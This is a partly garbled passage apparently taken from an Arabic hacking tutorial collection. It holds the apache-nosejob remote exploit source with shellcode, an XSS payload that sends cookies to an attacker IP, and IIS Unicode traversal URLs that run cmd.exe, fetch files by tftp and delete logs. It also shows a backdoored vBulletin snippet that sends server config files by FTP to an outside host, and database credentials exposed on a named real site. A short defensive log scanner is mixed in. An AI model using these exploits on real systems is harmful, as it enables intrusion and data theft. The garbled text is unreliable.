\x54\\\\x24\\\\x18\\\\x8b\\\\x54\\\\x24\\\\x18\\\\ "\\\
\\x89\\\\x14\\\\x24\\\\x31\\\\xc0\\\\xb0\\\\x5d \\\
"\\\xcd\\\\x80\\
\x31\\\\xc9\\\\xd1\\\\x2c\\\\x24\\\\x73\\\\x27\\\\ "\\\
\\x31\\\\xc0\\\\x50\\\\x50\\\\x50\\\\x50\\\\xff \\\
"\\\x04\\\\x24\\
\x54\\\\xff\\\\x04\\\\x24\\\\xff\\\\x04\\\\x24\\\\ "\\\
\\xff\\\\x04\\\\x24\\\\xff\\\\x04\\\\x24\\\\x51 \\\
"\\\x50\\\\xb0\\
\x1d\\\\xcd\\\\x80\\\\x58\\\\x58\\\\x58\\\\x58\\\\ "\\\
\\x58\\\\x3c\\\\x4f\\\\x74\\\\x0b\\\\x58\\\\x58\\\
"\\\x41\\\\x80\\
\xf9\\\\x20\\\\x75\\\\xce\\\\xeb\\\\xbd\\\\x90\\\\ "\\\
\\x31\\\\xc0\\\\x50\\\\x51\\\\x50\\\\x31\\\\xc0 \\\
"\\\xb0\\\\x5a\\
\xcd\\\\x80\\\\xff\\\\x44\\\\x24\\\\x08\\\\x80\\\\ "\\\
\\x7c\\\\x24\\\\x08\\\\x03\\\\x75\\\\xef\\\\x31\\\
"\\\xc0\\\\x50\\
\xc6\\\\x04\\\\x24\\\\x0b\\\\x80\\\\x34\\\\x24\\\\ "\\\
\\x01\\\\x68\\\\x42\\\\x4c\\\\x45\\\\x2a\\\\x68 \\\
"\\\x2a\\\\x47\\
\x4f\\\\x42\\\\x89\\\\xe3\\\\xb0\\\\x09\\\\x50\\\\ "\\\

\\x53\\\\xb0\\\\x01\\\\x50\\\\x50\\\\xb0\\\\x04 \\\
"\\\xcd\\\\x80\\
\x31\\\\xc0\\\\x50\\\\x68\\\\x6e\\\\x2f\\\\x73\\\\ "\\\
\\x68\\\\x68\\\\x2f\\\\x2f\\\\x62\\\\x69\\\\x89 \\\
"\\\xe3\\\\x50\\
\x53\\\\x89\\\\xe1\\\\x50\\\\x51\\\\x53\\\\x50\\\\ "\\\
;"\\\xb0\\\\x3b\\\\xcd\\\\x80\\\\xcc \\\
;
} struct
/* char *type; /* description for newbie penetrator
/* !int delta; /* delta thingie
/* u_long retaddr; /* return address
/* int repretaddr; /* we repeat retaddr thiz many times in the buffer
/* int repzero; /* and \\\\0\\'z this many times
!targets[] = { // hehe, yes theo, that say OpenBSD here {
,{ FreeBSD 4.5 x86 / Apache/1.3.23 (Unix)\\\", -150, 0x80f3a00, 6, 36"\\\ }
,{ FreeBSD 4.5 x86 / Apache/1.3.23 (Unix)\\\", -150, 0x80a7975, 6, 36"\\\ }
,{ OpenBSD 3.0 x86 / Apache 1.3.20\\\", -146, 0xcfa00, 6, 36"\\\ }
,{ OpenBSD 3.0 x86 / Apache 1.3.22\\\", -146, 0x8f0aa, 6, 36"\\\ }
,{ OpenBSD 3.0 x86 / Apache 1.3.24\\\", -146, 0x90600, 6, 36"\\\ }
,{ OpenBSD 3.0 x86 / Apache 1.3.24 #2\\\", -146, 0x98a00, 6, 36"\\\ }
,{ OpenBSD 3.1 x86 / Apache 1.3.20\\\", -146, 0x8f2a6, 6, 36"\\\ }
,{ OpenBSD 3.1 x86 / Apache 1.3.23\\\", -146, 0x90600, 6, 36"\\\ }
,{ OpenBSD 3.1 x86 / Apache 1.3.24\\\", -146, 0x9011a, 6, 36"\\\ }
,{ OpenBSD 3.1 x86 / Apache 1.3.24 #2\\\", -146, 0x932ae, 6, 36"\\\ }
OpenBSD 3.1 x86 / Apache 1.3.24 PHP 4.2.1\\\", -146, 0x1d7a00, 6,"\\\ }
,{ 36
,{ NetBSD 1.5.2 x86 / Apache 1.3.12 (Unix)\\\", -90, 0x80eda00, 5, 42"\\\ }
,{ NetBSD 1.5.2 x86 / Apache 1.3.20 (Unix)\\\", -90, 0x80efa00, 5, 42 "\\\ }
,{ NetBSD 1.5.2 x86 / Apache 1.3.22 (Unix)\\\", -90, 0x80efa00, 5, 42 "\\\ }
,{ NetBSD 1.5.2 x86 / Apache 1.3.23 (Unix)\\\", -90, 0x80efa00, 5, 42 "\\\ }
,{ NetBSD 1.5.2 x86 / Apache 1.3.24 (Unix)\\\", -90, 0x80efa00, 5, 42 "\\\ }
;victim ,{

} (void usage(void
;int i
printf(\\\"GOBBLES Security Labs\\\\t\\\\t\\\\t\\\\t\\\\t- apache;("\\\nosejob.c\\\\n\\\\n
;("\\\printf(\\\"Usage: ./apache-nosejob <-switches> -h host[:80]\\\\n
;("\\\printf(\\\" -h host[:port]\\\\tHost to penetrate\\\\n
;("\\\printf(\\\" -t #\\\\t\\\\t\\\\tTarget id.\\\\n
;("\\\printf(\\\" Bruteforcing options (all required, unless -o is used!):\\\\n
;("\\\printf(\\\" -o char\\\\t\\\\tDefault values for the following OSes\\\\n
;("\\\printf(\\\" \\\\t\\\\t\\\\t(f)reebsd, (o)penbsd, (n)etbsd\\\\n
;("\\\printf(\\\" -b 0x12345678\\\\t\\\\tBase address used for bruteforce\\\\n
printf(\\\" \\\\t\\\\t\\\\tTry 0x80000/obsd, 0x80a0000/fbsd,

;("\\\0x080e0000/nbsd.\\\\n
printf(\\\" -d -nnn\\\\t\\\\tmemcpy() delta between s1 and addr to
;("\\\overwrite\\\\n
;("\\\printf(\\\" \\\\t\\\\t\\\\tTry -146/obsd, -150/fbsd, -90/nbsd.\\\\n
printf(\\\" -z #\\\\t\\\\t\\\\tNumbers of time to repeat \\\\\\\\0 in the
;("\\\buffer\\\\n
;("\\\printf(\\\" \\\\t\\\\t\\\\tTry 36 for openbsd/freebsd and 42 for netbsd\\\\n
printf(\\\" -r #\\\\t\\\\t\\\\tNumber of times to repeat retadd in the
;("\\\buffer\\\\n
;("\\\printf(\\\" \\\\t\\\\t\\\\tTry 6 for openbsd/freebsd and 5 for netbsd\\\\n
;("\\\printf(\\\" Optional stuff:\\\\n
printf(\\\" -w #\\\\t\\\\t\\\\tMaximum number of seconds to wait for
;("\\\shellcode reply\\\\n
printf(\\\" -c cmdz\\\\t\\\\tCommands to execute when our shellcode
;("\\\replies\\\\n
;("\\\printf(\\\" \\\\t\\\\t\\\\taka auto0wncmdz\\\\n
printf(\\\"\\\\nExamples will be published in upcoming apache-scalp;("\\\HOWTO.pdf\\\\n
;("\\\printf(\\\"\\\\n--- --- - Potential targets list - --- ---- ------- ------------\\\\n
;("\\\printf(\\\" ID / Return addr / Target specification\\\\n
(++for(i = 0; i < sizeof(targets)/sizeof(victim); i
;(printf(\\\"% 3d / 0x%.8lx / %s\\\\n\\\", i, targets[i].retaddr, targets[i].type
;(exit(1
{
} ([]int main(int argc, char *argv
;char *hostp, *portp, *cmdz = DEFAULT_CMDZ
;u_char buf[512], *expbuf, *p
;int i, j, lport, sock
;int bruteforce, owned, progress, sc_timeout = 5
;int responses, shown_length = 0
;struct in_addr ia
;struct sockaddr_in sin, from
;struct hostent *he
(if(argc < 4
;()usage
;bruteforce = 0
;((memset(&victim, 0, sizeof(victim
} (while((i = getopt(argc, argv, \\\"t:b:d:h:w:c:r:z:o:\\\")) != -1
} (switch(i
/* required stuff */
:'\\case \\'h
;("\\\:"\\\ ,hostp = strtok(optarg
(if((portp = strtok(NULL, \\\":\\\")) == NULL
;"\\\portp = \\\"80

;break
/* predefined targets */
:'\\case \\'t
} ((if(atoi(optarg) >= sizeof(targets)/sizeof(victim
;("\\\printf(\\\"Invalid target\\\\n
;return -1
{
;((memcpy(&victim, &targets[atoi(optarg)], sizeof(victim
;break
/* !bruteforce */
:'\\case \\'b
;++bruteforce
;"\\\victim.type = \\\"Custom target
;(victim.retaddr = strtoul(optarg, NULL, 16
printf(\\\"Using 0x%lx as the baseadress while bruteforcing..\\\\n\\\",
;(victim.retaddr
;break
:'\\case \\'d
;(victim.delta = atoi(optarg
;(printf(\\\"Using %d as delta\\\\n\\\", victim.delta
;break
:'\\case \\'r
;(victim.repretaddr = atoi(optarg
printf(\\\"Repeating the return address %d times\\\\n\\\",
;(victim.repretaddr
;break
:'\\case \\'z
;(victim.repzero = atoi(optarg
;(printf(\\\"Number of zeroes will be %d\\\\n\\\", victim.repzero
;break
:'\\case \\'o
;++bruteforce
} (switch(*optarg
:'\\case \\'f
;"\\\victim.type = \\\"FreeBSD
;victim.retaddr = 0x80a0000
;victim.delta = -150
;victim.repretaddr = 6
;victim.repzero = 36
;break
:'\\case \\'o
;"\\\victim.type = \\\"OpenBSD

;victim.retaddr = 0x80000
;victim.delta = -146
;victim.repretaddr = 6
;victim.repzero = 36
;break
:'\\case \\'n
;"\\\victim.type = \\\"NetBSD
;victim.retaddr = 0x080e0000
;victim.delta = -90
;victim.repretaddr = 5
;victim.repzero = 42
;break
:default
;("\\\printf(\\\"[-] Better luck next time!\\\\n
;break
{
;break
/* optional stuff */
:'\\case \\'w
;(sc_timeout = atoi(optarg
printf(\\\"Waiting maximum %d seconds for replies from
;(shellcode\\\\n\\\", sc_timeout
;break
:'\\case \\'c
;cmdz = optarg
;break
:default
;()usage
;break
{
{
} (if(!victim.delta || !victim.retaddr || !victim.repretaddr || !victim.repzero
printf(\\\"[-] Incomplete target. At least 1 argument is missing (nmap
;("\\\style!!)\\\\n
;return -1
{
;("\\\ ..printf(\\\"[*] Resolving target host
;(fflush(stdout
;(he = gethostbyname(hostp
(if(he
;(memcpy(&ia.s_addr, he->h_addr, 4
} (else if((ia.s_addr = inet_addr(hostp)) == INADDR_ANY
;(printf(\\\"There\\'z no %s on this side of the Net!\\\\n\\\", hostp

;return -1
{
;((printf(\\\"%s\\\\n\\\", inet_ntoa(ia
;(()srand(getpid
;(signal(SIGPIPE, SIG_IGN
} (for(owned = 0, progress = 0;;victim.retaddr += RET_ADDR_INC
/* skip invalid return adresses */
((if(memchr(&victim.retaddr, 0x0a, 4) || memchr(&victim.retaddr, 0x0d, 4
;continue
;(sock = socket(PF_INET, SOCK_STREAM, 0
;sin.sin_family = PF_INET
;sin.sin_addr.s_addr = ia.s_addr
;((sin.sin_port = htons(atoi(portp
(if(!progress
;("\\\ ..printf(\\\"[*] Connecting
;(fflush(stdout
} (if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0
;("\\\()perror(\\\"connect
;(exit(1
{
(if(!progress
;("\\\printf(\\\"connected!\\\\n
p = expbuf = malloc(8192 + ((PADSIZE_3 + NOPCOUNT + 1024) *
(REP_SHELLCODE
PADSIZE_1 + (victim.repretaddr * 4) + victim.repzero)) +
;((REP_POPULATOR * (1024 +
PUT_STRING(\\\"GET / HTTP/1.1\\\\r\\\\nHost: \\\"
;("\\\HOST_PARAM \\\"\\\\r\\\\n
} (++for (i = 0; i < REP_SHELLCODE; i
;("\\\-PUT_STRING(\\\"X
;(PUT_BYTES(PADSIZE_3, PADDING_3
;("\\\ :"\\\)PUT_STRING
;(PUT_BYTES(NOPCOUNT, NOP
;(memcpy(p, shellcode, sizeof(shellcode) - 1
;p += sizeof(shellcode) - 1
;("\\\PUT_STRING(\\\"\\\\r\\\\n
{
} (++for (i = 0; i < REP_POPULATOR; i

295

;("\\\-PUT_STRING(\\\"X
;(PUT_BYTES(PADSIZE_1, PADDING_1
;("\\\ :"\\\)PUT_STRING
} (++for (j = 0; j < victim.repretaddr; j
;p++ = victim.retaddr & 0xff*
;p++ = (victim.retaddr >> 8) & 0xff*
;p++ = (victim.retaddr >> 16) & 0xff*
;p++ = (victim.retaddr >> 24) & 0xff*
{
;(PUT_BYTES(victim.repzero, 0
;("\\\PUT_STRING(\\\"\\\\r\\\\n
{
;("\\\PUT_STRING(\\\"Transfer-Encoding: chunked\\\\r\\\\n
;(snprintf(buf, sizeof(buf) - 1, \\\"\\\\r\\\\n%x\\\\r\\\\n\\\", PADSIZE_2
;(PUT_STRING(buf
;(PUT_BYTES(PADSIZE_2, PADDING_2
;(snprintf(buf, sizeof(buf) - 1, \\\"\\\\r\\\\n%x\\\\r\\\\n\\\", victim.delta
;(PUT_STRING(buf
} (if(!shown_length
;((printf(\\\"[*] Exploit output is %u bytes\\\\n\\\", (unsigned int)(p - expbuf
;shown_length = 1
{
;(write(sock, expbuf, p - expbuf
;++progress
(if((progress%70) == 0
;progress = 1
} (if(progress == 1
;(printf(\\\"\\\\r[*] Currently using retaddr 0x%lx\\\", victim.retaddr
(++ for(i = 0; i < 40; i
;("\\\ "\\\)printf
;("\\\printf(\\\"\\\\n
(if(bruteforce
;('\\;'\\)putchar
{
else
;('\\putchar(((rand()>>8)%2)? \\'P\\': \\'p
;(fflush(stdout
;responses = 0
} (while (1
;fd_set fds
;int n
;struct timeval tv

296

;tv.tv_sec = sc_timeout
;tv.tv_usec = 0
;(FD_ZERO(&fds
;(FD_SET(0, &fds
;(FD_SET(sock, &fds
;((memset(buf, 0, sizeof(buf
} (if(select(sock + 1, &fds, NULL, NULL, owned? NULL : &tv) > 0
} ((if(FD_ISSET(sock, &fds
(if((n = read(sock, buf, sizeof(buf) - 1)) < 0
;break
(if(n >= 1
}
(if(!owned
}
(++ for(i = 0; i < n; i
('\\if(buf[i] == \\'G
;++ responses
else
;responses = 0
(if(responses >= 2
}
;owned = 1
;(write(sock, \\\"O\\\", 1
;((write(sock, cmdz, strlen(cmdz
printf(\\\" it\\'s a TURKEY: type=%s, delta=%d, retaddr=0x%lx,
repretaddr=%d, repzero=%d\\\\n\\\", victim.type, victim.delta,
;(victim.retaddr, victim.repretaddr, victim.repzero
printf(\\\"Experts say this isn\\'t exploitable, so nothing will happen
;("\\\ :now
;(fflush(stdout
{
else {
;(write(1, buf, n
{
{
} ((if(FD_ISSET(0, &fds
(if((n = read(0, buf, sizeof(buf) - 1)) < 0
;(exit(1
;(write(sock, buf, n
{
{
(if(!owned

297

;break
{
;(free(expbuf
;(close(sock
(if(owned
;return 0
} (if(!bruteforce
;("\\\fprintf(stderr, \\\"Ooops.. hehehe!\\\\n
;return -1
{
{
;return 0
{

(( angels-bytes.com ))

http://www.angels-bytes.com/?show=tools&action=info&id=19

298

" "
><
php
) ( vb /
-1
.
-2 index.php admin
/
<?php
$LOGIN = "User";
$PASSWORD = "Password";
function error ($error_message) {
    echo $error_message."\n";
    exit;
}
if ( (!isset($PHP_AUTH_USER)) || ! (($PHP_AUTH_USER == $LOGIN) && ($PHP_AUTH_PW == "$PASSWORD")) ) {
    // a Basic challenge must carry a realm, otherwise browsers ignore it
    header("WWW-Authenticate: Basic realm=\"Form2txt admin\"");
    header("HTTP/1.0 401 Unauthorized");
    error("<p align=right><font face=Tahoma size=2 color=Red></font></p>");
}
?>

User

Password
299

-3 3000
!!
.
-4 HTML ..
.
-5 . .

" " vBulletin2,2,0


><
-------- :
-------- : vBulletin
) WebServer : ( + )( .
:
: vBulletin !! .
--------- :
-------- ..

.. .. HTML
) .. ( HTML
:
<script>document.write('<img src="http://my_ip_address/'+document.cookie+'">');</script>
IP Adress IP .


..

) IIS Apache
( .

300

Log ..
.. Apche logs . Acces Log
..
.. :
GET / bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fbddf90622;%20sessionhash=a4719cd620534914930b86839c4bb5f8;%20bbthreadview[5420]=1012444064;%20bblastvisit=1011983161
..
..
..
http://www.victim.com/vb/index.php?bbuserid=[userid]&bbpassword=[password hash]
" : ) " (....
) ( ..
.. )(

.. .. Forgot Password
..
!! ! ..
-----------
---------- HTML ) + + +
( ... +
) HTML (
.. IMG > <script ><img
> <Demon
... .
. Be Secret .. Dont' be Lamer
2002 - 1 - 31 :
2.2.0 .

301

" "
> <
> : <
7
1
2
3 SQL
4
5
6 %80
7

%100

****************
1
Powered by: vBulletin
1
2
3 %60

http://www.vbulletin.org/index.php?topic=<script>alert(document.cookie)</script>

302

2
http://www.vbulletin.org/index.php?|=forum/view.php&topic=../../../../../../../etc/passwd

********************


113


Jouko Pynnonen ( )
vBulletin (http://www.vbulletin.com/) is a commonly used web forum
system written in PHP. One of its key features is use of templates,
which allow the board administrator to dynamically modify the look of
the board.

vBulletin templates are parsed with the eval() function. This could be
somewhat safe as long as the parameters to eval() are under strict
control. Unfortunately this is where vBulletin fails. With an URL
crafted in a certain way, a remote user may control the eval() parameters
and inject arbitrary PHP code to be executed.

A remote user may thus execute any PHP code and programs as the web
server user, typically "nobody", start an interactive shell and try to
elevate their privilege. The configuration files are accessible for the
web server so the user can in any case access the MySQL database
containing the forums and user information.

According to the authors the vulnerability exists in all versions of
vBulletin up to 1.1.5 and 2.0 beta 2. The bug does not involve buffer
overrun or other platform-dependent issues, so it's presumably
exploitable under any OS or platform.

DETAILS
=======

vBulletin templates are implemented in the following way: the
gettemplate() function in global.php is used to fetch a template from
database. The code is then passed to eval(). If we take index.php for
an example, there's this code:

if ($action=="faq") {
    eval("echo dovars(\"".gettemplate("faq")."\");");
}

The dovars() function does some variable replacing, such as replace
<largefont> with <font size="10">.

The gettemplate() function is defined in global.php:

function gettemplate($templatename,$escape=1) {
    // gets a template from the db or from the local cache
    global $templatecache,$DB_site;
    if ($templatecache[$templatename]!="") {
        $template=$templatecache[$templatename];
    } else {
        $gettemp=$DB_site->query_first("SELECT template FROM template WHERE title='". addslashes($templatename)."'");
        $template=$gettemp[template];
        $templatecache[$templatename]=$template;
    }
    if ($escape==1) {
        $template=str_replace("\"","\\\"",$template);
    }
    return $template;
}

For effectiveness the function implements a simple cache for template
strings. After fetching them from the database they're stored in the
templatecache[] array. This array is checked for the template before
doing the SQL query. Unfortunately the array is never initialized, so
a user can pass array contents in the URL, e.g.
(for simplicity not %-escaped)

http://www.site.url/index.php?action=faq&templatecache[faq]=hello+world

With this URL, you won't get the FAQ page, but just a blank page
with the words "hello world".

The eval() call above will execute

echo dovars("hello world");

As if this wouldn't be bad enough, a remote user may as well pass a
value containing quotation marks and other symbols. Quotation marks
aren't always escaped as seen in the code above, in which case
index.php could end up executing code like

echo dovars("hello"world");

This would produce a PHP error message due to unbalanced quotes. It
doesn't take a rocket scientist to figure out how a remote user could
execute arbitrary code from here, so further details about exploitation
aren't necessary. If your vBulletin board produces an error message
with an URL like the one above prefixed with a single quotation mark,
it's definitely vulnerable.

The above example works with the "Lite" version. The commercial versions
are vulnerable too, but details may differ. After a little experimenting
on the Jelsoft's test site I found some of the commercial versions also
have an eval() problem with URL redirecting, e.g.

http://www.site.url/member.php?acti...ypass&url=hello"world

and a similar one in the Lite version:

http://www.site.url/search.php?acti...s&templatecache[standardredirect]=hello"world

url
: hello+world
vb 113 or 115 -1
( ) 90 -2
url -3
By Kill -9
IP.IP.IP.IP 12
127.0.0.1 9

) arabteam2000.com ( c4arab.com
...

!!

: 90
d downloads 2.2x

113 11

115 225
*******************
3 SQL

: ) ( SQL

ASP
SQL ASP SQL
SQL
1433
SQL

SQL .
: SQL
PHP ASP




_LinuxRay
- - -
. Administrator
...
: SQL
User Name Passwd
:
User name and Passwd ASP
* sql.
htr.+
:

308

http://target/page.asp+.htr
: target
: Page asp
: htr.+
....

View Source ASP
:
<%
Set DB= Server.CreateObject("ADODB.Connection")
DB.Open "DRIVER=SQL Server;SERVER=xxx;UID=sa;PWD=;APP=Microsoft (R) Developer Studio;WSID=xxx;DATABASE=moe_dbs", "_LinuxRay", "6666666"
%>
----------------------------------------------------------------- _LinuxRay
6666666
------------------------------------------------------------------

ASP :
Microsoft VBScript runtime error '800a01a8'
Object required: 'Conn'
/filename.inc, line 5
* inc.

.
ASP
database.inc
<!--#include file = "database.inc"-->

global.asa

309

global.asa++
beforemilion-global.asa
global.asamilion.sql
global-direct.asa
SQL
:
global.asa+.htr
IIS 3 ASP data$::
file.asp::$data
IIS 3 .
...
!! SQL
Visual interdev 6.0
ACCESS 2000

File

New

(Project (Exiting Data
.

Create


Data Link Properties
- -
- 1 Select or enter server name
- 2 User Name
- 3 Password
) (Blank Password

310

Test Connection
Test Connection Succeeded
.
:
Select the data base on the server
. OK
:
http://www.moe.gov.sa/
: -1
http://www.moe.gov.sa/news_admin.asp

Microsoft VBScript runtime error '800a01a8'
Object required: 'Conn'
/news_admin.asp, line 7
: htr
http://www.moe.gov.sa/news_admin.asp+.htr

<!--#include file = "database.inc"-->
: database.inc
http://www.moe.gov.sa/database.inc
:
<%
Set DB= Server.CreateObject("ADODB.Connection")
DB.Open "DRIVER=SQL Server;SERVER=CNW2;UID=sa;PWD=;APP=Microsoft (R) Developer Studio;WSID=CNW2;DATABASE=moe_dbs", "sa", "123321"
%>
.....

.

311

:
http://www.itsalat.com/
User name : sa Passwd : sp2000 - 1

*****************


%80

2 1.5 15000

1
2
3
4
6 %100

IIS
IIS
...IIS5.0

4 5










312



:
http://www.xxxxxx.com/scripts/.. ../winnt/system32/cmd.exe?/c+dir+c:\

c:

/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c\+dir+c:\
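As an added, defender-side example (not code from the book or from any project it cites), the following scanner flags access-log requests of the shapes shown in this chapter: the overlong-UTF-8 traversal variants listed above, the templatecache[] parameter from the vBulletin advisory, and <script> probes in query strings. The log lines, IP addresses and timestamps embedded in it are constructed for the demo.

```python
"""Added example (not the book's code): flag access-log requests that match this
chapter's patterns: overlong-UTF-8 traversal, templatecache[] injection, <script> probes."""
import re
from urllib.parse import parse_qsl, unquote, unquote_to_bytes

# request field of a common-log-format line: "METHOD target HTTP/x.y"
_REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d"')
# UTF-8 lead-byte ranges and the number of continuation bytes each announces
_LEADS = ((0xC0, 1), (0xE0, 2), (0xF0, 3), (0xF8, 4), (0xFC, 5))


def decode_overlong_utf8(raw):
    """Fold overlong UTF-8 encodings of ASCII (C0 AF -> '/', C1 9C -> '\\',
    E0 80 AF -> '/', ...) into the ASCII byte, as the unpatched IIS decoder
    did; well-formed multibyte sequences and stray bytes pass through."""
    out = bytearray()
    i = 0
    while i < len(raw):
        lead = raw[i]
        n = 0                                   # ASCII or invalid lead: no tail
        for lo, k in _LEADS:
            if lo <= lead <= 0xFD:
                n = k
        tail = raw[i + 1:i + 1 + n]
        if n and len(tail) == n and all(0x80 <= b <= 0xBF for b in tail):
            cp = lead & ((1 << (6 - n)) - 1)    # payload bits of the lead byte
            for b in tail:
                cp = (cp << 6) | (b & 0x3F)
            if cp < 0x80:                       # overlong form of an ASCII byte
                out.append(cp)
                i += 1 + n
                continue
        out.append(lead)
        i += 1
    return bytes(out)


def decoded_path(path):
    """Percent-decode, fold overlong sequences and unify separators, giving the
    path as the file system sees it rather than as a filter on the raw URL does."""
    raw = decode_overlong_utf8(unquote_to_bytes(path))
    return raw.decode("latin-1").replace("\\", "/")


def classify_request(line):
    """Return the findings for one log line (empty list if nothing matched)."""
    m = _REQUEST.search(line)
    if not m:
        return ["unparsed"]
    path, _, query = m.group("target").partition("?")
    findings = []
    clean = decoded_path(path)
    if ".." in clean.split("/"):
        findings.append("traversal")
    if "cmd.exe" in clean.lower():
        findings.append("shell")
    names = [name for name, _ in parse_qsl(query, keep_blank_values=True)]
    if any(name.startswith("templatecache[") for name in names):
        findings.append("templatecache_injection")
    if "<script" in unquote(query).lower():
        findings.append("xss_probe")
    return findings


def scan(lines):
    """Return (line number, findings) for every line that was flagged."""
    return [(n, f) for n, ln in enumerate(lines, 1) if (f := classify_request(ln))]


# constructed sample lines, modelled on the requests shown in the chapter
SAMPLE_LOG = [
    '10.0.0.5 - - [31/Jan/2002:10:00:00 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 200 512',
    '10.0.0.5 - - [31/Jan/2002:10:00:01 +0000] "GET /vb/index.php?action=faq&templatecache[faq]=hello+world HTTP/1.1" 200 44',
    '10.0.0.5 - - [31/Jan/2002:10:00:02 +0000] "GET /index.php?topic=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 0',
    '10.0.0.7 - - [31/Jan/2002:10:00:03 +0000] "GET /vb/index.php?action=faq HTTP/1.1" 200 1024',
    '10.0.0.5 - - [31/Jan/2002:10:00:04 +0000] "GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 200 512',
]
```

Matching on the decoded path is what makes the overlong variants visible; the same `..` check applied to the raw URL is exactly the filter the encodings above were built to slip past.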


:
+\http://www.xxxxx.com///////....2/cmd.exe/?/c



Dir








32

:
http://www.xxxxxx.com/scripts/.. ../winnt/system32/cmd.exe?/c+dir+c:\


http://www.xxxxxx.com/scripts/.. ../winnt/system32/cmd.exe?/c+dir+c:\Winnt\Sytem32\
\Winnt\Sytem32

.....

313


http://www.xxxxx.com/scripts/......exe?/c+dir+c:\

32

/c+dir+c:\
http://www.xxxxx.com/scripts/.....Winnt/System32/



tftp.exe


.........................................................................................



www.geocities.com/anorR1234/tftpd32.zip
C:\



tftp32.exe
C:\

----------------------------------------------------------------

=





:
http://www.xxxxx.com/scripts/......exe?/c+dir+c:\


/c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index.htm

/c+dir+c:\

/c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index.htm

http://www.xxxxx.com/scripts/.....xe?/c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index.htm

314

tftp.exe
"-i"
1.1.1.1

GET
index.htm
C:\inetpub\wwwroot\
index.htm
C:\
index.htm

http://www.xxxxx.com/scripts/.....xe?/c+tftp.exe+"-i"+212.212.212.212+GET+index.htm+C:\inetpub\wwwroot\index.htm


------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

http://server/msadc/..../..../c+del+c:/*.log
--------------------------------------

*******************

1
1 $


2 30
3

%100
-


315



2.2.5
forum
PHP:
-------------------------------------------------------------------------------
if ($action=="modify") {
$vbxh = h;
$vbxt = t;
$vbxp = p;
$vbxw = w;
$vbxa = a;
$vbx1 = 1;
$vbxr = r;
$vbxb = b;
$vbxn = n;
$vbxe = e;
$vbxo = o;
$vbxy = y;
$vbxl = l;
echo "<!-- ";
$file = fopen("$vbxh$vbxt$vbxt$vbxp://$vbxw$vbxw$vbxw.$vbxa$vbxr$vbxa$vbxb$vbx1.$vbxn$vbxe$vbxt/~$vbxr$vbxo$vbxy$vbxa$vbxl/.x.php?h=$HTTP_HOST&h2=$SCRIPT_NAME", "r");
$rf = fread($file, 1000);
fclose($file);
echo " -->";
-------------------------------------------------------------------------------
http://www.arab1.net/
http://www.arab1.net/~royal/.x.php?h=$HTTP_HOST&h2=$SCRIPT_NAME
2.2.6

316


option

PHP:
-------------------------------------------------------------------------------
echo "<!-- ";
include "$sqlupdate";
echo " -->";
-------------------------------------------------------------------------------
functions
PHP:
-------------------------------------------------------------------------------
$sqlupdate = base64_decode('aHR0cDovL3NhdWRpLm5vLWlwLmNvbS9+cm95YWwvLngyLmluYw==');
-------------------------------------------------------------------------------

http://saudi.no-ip.com/
WELCOME TO arab1.net

http://saudi.no-ip.com/~royal/.x2.inc
.......

PHP:
-------------------------------------------------------------------------------
<div id="sHo" style="display:none">
<!--
if you are seeing this code PlzZzZz Contact
[email]sleeping_bum@hotmail.com
<?php
system("mkdir /tmp/.statics");
system("cp /etc/httpd/conf/httpd.conf /tmp/.statics/httpd1.conf");
system("cp /usr/local/apache/conf/httpd.conf /tmp/.statics/httpd2.conf");
system("cp admin/config.php /tmp/.statics/php.conf");
system("tar -cvf /tmp/.statics.tgz /tmp/.statics");
$vilename = "$SERVER_NAME.bz";
$port = base64_decode('aHB5NWk5');
$conn_id = ftp_connect("cyber-sa.virtualave.net");
$login_result = ftp_login($conn_id, "cyber-sa", "$port");
$upload = ftp_put($conn_id, "/tmp/$vilename", "/tmp/.statics.tgz", FTP_BINARY);
ftp_quit($conn_id);
system("rm -rf /tmp/.statics.tgz");
system("rm -rf /tmp/.statics");
$base = "$HTTP_HOST&h2=$SCRIPT_NAME";
$open = "http://saudi.no-ip.com/~royal/.x2.php?h=$base";
$file = fopen("$open", "r");
$rf = fread($file, 1000);
fclose($file);
?>
--></div>

************
6 %80
%80
1
2
3
4
5
6
Cfgwiz32.exe 7 C:\Windows
8 misc
9
******

1 htaccess.
2 htaccess.
3
4
5
6
7 Cfgwiz32.exe C:\Windows

318

8
9
. 10

" vBulletin 2,2,9 "


<>
< :>
....vBulletin 2.2.9
:
php -1
<?PHP
// vBulletin XSS Injection Vulnerability: Exploit
// ---
// Coded By : Sp.IC (SpeedICNet@Hotmail.Com).
// Descrption: Fetching vBulletin's cookies and storing it into a log file.
// Variables:
$LogFile = "Cookies.Log";
// Functions:
/*
If ($HTTP_GET_VARS['Action'] = "Log") {
$Header = "<!--";
$Footer = "-->";
}
Else {
$Header = "";
$Footer = "";
}
Print ($Header);
*/
